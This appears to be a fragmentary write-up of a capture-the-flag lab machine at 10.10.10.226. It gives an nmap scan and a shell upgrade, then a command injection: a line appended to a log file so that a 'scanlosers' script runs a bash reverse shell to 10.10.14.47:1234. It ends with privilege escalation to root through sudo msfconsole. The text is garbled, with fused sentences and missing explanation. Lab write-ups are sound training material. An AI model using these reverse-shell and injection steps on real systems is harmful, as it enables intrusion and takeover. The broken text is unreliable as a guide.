nmap -sV 10.10.10.226
python3 -c 'import pty;pty.spawn("/bin/bash")'
pwn
user, and there is a scanlosers
script.cut -d' ' -f3-'
: refer to the manual page https://man7.org/linux/man-pages/man1/cut.1.html"" <space> "" <space> ";/bin/bash -c ..."
so that the command is retained.echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.47/1234 0>&1' #" >> /home/kid/logs/hackers
pwn
user, with higher privileges.sudo -l
msfconsole
as root!sudo msfconsole
will give us a shell as root.